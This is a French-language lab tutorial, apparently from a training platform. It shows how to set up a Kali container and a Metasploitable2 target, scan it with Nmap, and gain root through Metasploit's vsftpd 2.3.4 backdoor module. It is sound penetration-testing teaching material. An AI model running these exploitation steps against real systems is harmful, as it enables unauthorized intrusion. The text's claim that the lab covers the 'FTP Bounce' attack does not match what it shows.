Exploitation des vulnérabilités du service FTP avec Nmap et Metasploit

NmapBeginner
Pratiquer maintenant

Introduction

Dans ce laboratoire, vous apprendrez à exploiter les vulnérabilités du service File Transfer Protocol (FTP) pour accéder de manière non autorisée à une machine cible. Le scénario se déroule dans un contexte de cybersécurité, où vous prendrez le rôle d'un hacker éthique chargé d'identifier et d'exploiter les vulnérabilités d'un serveur FTP vulnérable.

L'objectif de ce laboratoire est d'obtenir un accès root à la machine cible Metasploitable2 en exploitant une vulnérabilité du service FTP et en utilisant le Metasploit Framework, un outil de test de pénétration populaire. Grâce à cette expérience pratique, vous comprendrez mieux l'attaque FTP Bounce, les techniques de numérotation de ports (port scanning) et le processus d'exploitation à l'aide de Metasploit.

Configurer l'environnement de laboratoire

Dans cette étape, vous allez configurer l'environnement de laboratoire, qui se compose de deux machines virtuelles : la machine Kali Linux en tant qu'attaquant et la machine Metasploitable2 en tant que cible.

  1. Démarrez la machine virtuelle Metasploitable2 en exécutant la commande suivante dans le terminal :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Vérifiez que la machine Metasploitable2 est en cours d'exécution en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Lancez le conteneur Kali Linux et accédez à son interpréteur de commandes bash :
docker run -ti --network host b5b709a49cd5 bash
  1. Testez la connectivité réseau entre le conteneur Kali Linux et la machine Metasploitable2 :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Maintenant, à la fois la machine d'attaque et la machine cible sont en cours d'exécution, et vous pouvez commencer le test de pénétration.

Remarque : Si vous quittez accidentellement le terminal bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et accéder au bash pour continuer l'expérience.

Effectuer un balayage de ports

Dans cette étape, vous utiliserez l'outil de numérotation de ports Nmap pour identifier les ports ouverts et les services en cours d'exécution sur la machine cible Metasploitable2.

  1. Démarrez le service de base de données PostgreSQL, requis par Metasploit :
service postgresql start
  1. Initialisez la base de données Metasploit :
msfdb init
  1. Lancez la console du Metasploit Framework :
cd ~
msfconsole
  1. Utilisez Nmap pour scanner la machine cible et identifier les ports ouverts :
nmap -sV -T4 192.168.122.102

L'option -sV active la détection de version pour les ports ouverts, et -T4 définit la stratégie de temporisation pour un scan plus rapide.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Exploiter la vulnérabilité du service FTP

Dans cette étape, vous allez exploiter la vulnérabilité identifiée du service FTP pour accéder de manière non autorisée à la machine cible Metasploitable2.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Recherchez un module de numérotation (scanner) FTP dans Metasploit :
search scanner/ftp
  1. Utilisez le module ftp_version pour scanner le service FTP :
use auxiliary/scanner/ftp/ftp_version
  1. Définissez l'hôte cible pour le scan :
set RHOSTS 192.168.122.102
  1. Exécutez le scan de la version FTP :
exploit
  1. Sur la base de la version FTP identifiée, recherchez un module d'exploitation correspondant :
search vsFTPd
  1. Utilisez le module vsftpd_234_backdoor pour exploiter la vulnérabilité :
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Définissez l'hôte cible pour l'exploitation :
set RHOST 192.168.122.102
  1. Exécutez l'exploitation :
exploit

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Vérifier la réussite de l'exploitation

Dans cette étape, vous allez vérifier que l'exploitation a réussi et que vous avez obtenu un accès root à la machine cible Metasploitable2.

  1. Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
  1. Vérifiez l'utilisateur actuel :
whoami
  1. Vérifiez le nom d'hôte de la machine compromise :
hostname
  1. Vérifiez l'adresse IP de la machine compromise :
ifconfig

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, vous avez appris à exploiter une vulnérabilité du service FTP pour accéder de manière non autorisée à une machine cible. Vous avez configuré un environnement de laboratoire avec une machine Metasploitable2 vulnérable et une machine d'attaque Kali Linux. Vous avez effectué une numérotation de ports (port scanning) à l'aide de Nmap pour identifier les ports ouverts et les services, puis vous avez utilisé le Metasploit Framework pour exploiter une vulnérabilité identifiée du service FTP. Enfin, vous avez vérifié le succès de l'exploitation en vérifiant l'utilisateur actuel, le nom d'hôte et l'adresse IP de la machine compromise.

Grâce à cette expérience pratique, vous avez acquis des connaissances et des compétences pratiques dans l'identification et l'exploitation de vulnérabilités, l'utilisation d'outils de cybersécurité populaires tels que Nmap et Metasploit, et la compréhension de la technique d'attaque FTP Bounce. Ces compétences sont essentielles pour les hackers éthiques et les professionnels de la cybersécurité afin d'évaluer et de renforcer la posture de sécurité des systèmes et des réseaux.